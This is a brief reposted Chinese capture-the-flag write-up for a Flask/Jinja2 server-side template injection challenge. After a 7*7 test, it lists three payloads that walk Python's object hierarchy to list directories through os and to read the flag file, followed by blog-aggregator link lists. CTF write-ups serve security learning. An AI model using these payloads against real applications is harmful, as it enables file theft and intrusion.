[wp] 攻防世界 Web_python_template_injection

其他 2020-03-15 14:39:45 阅读次数: 0

在这里插入图片描述
7*7变成49了,应该存在模板注入

{{''.__class__.__mro__[2].__subclasses__()}}

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

在这里插入图片描述
从零学习flask模板注入
原理在这位师傅的文章里已经写的很详细啦

MercyLin

发布了32 篇原创文章 · 获赞 9 · 访问量 1万+

私信关注

猜你喜欢

转载自blog.csdn.net/qq_40884727/article/details/101605002

[wp] Web_python_template_injection 攻防世界

[wp] 攻防世界 Web_python_template_injection

攻防世界 Web_python_template_injection wp

攻防世界 Web_python_template_injection

Web_python_template_injection攻防世界ctf web

攻防世界web进阶区Web_python_template_injection

攻防世界之Web_python_template_injection （web进阶）

攻防世界-Web_python_template_injection题

攻防世界高手进阶之Web_python_template_injection

攻防世界wp--web cookie

[wp] 攻防世界 Web_php_unserialize

[wp] 攻防世界-web2

[wp] 攻防世界 Web_php_include

[wp] 攻防世界 Web_php_unserialize

[wp] 攻防世界 baby_web

攻防世界----（web进阶）FlatScience--WP

[wp]攻防世界-bug

攻防世界EasyRe WP

攻防世界 crypto wp

攻防世界 | webshell WP

攻防世界-shrine wp

攻防世界-easytornado wp

攻防世界 easytornado wp

攻防世界wp--web新手2

攻防世界wp--web simple_php

[wp] 攻防世界 Web_php_wrong_nginx_config

攻防世界wp--web command_execution

攻防世界wp--web weak_auth

攻防世界web新手练习区WP

攻防世界 BUG 题 WP

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型

JS实现无缝滚动上

深入解析HashMap原理（基于JDK1.8）

mysql的连接池

关于.htc

linux下的ubuntu12.04图形界面

【数论】好推不好记的扩展欧几里德

设备树详解

cscope + tags 简单设置

xml学习

每日归档

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)